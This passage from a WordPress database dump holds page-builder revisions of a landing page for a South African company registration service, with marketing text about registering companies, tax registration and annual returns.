10:11:53','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32784,3,'2019-08-15 12:08:15','2019-08-15 10:08:15','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do First ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Conbo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 12:08:15','2019-08-15 10:08:15','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32792,3,'2019-08-15 12:52:10','2019-08-15 10:52:10','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do First ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>PTY to NPO to <br />We Do It 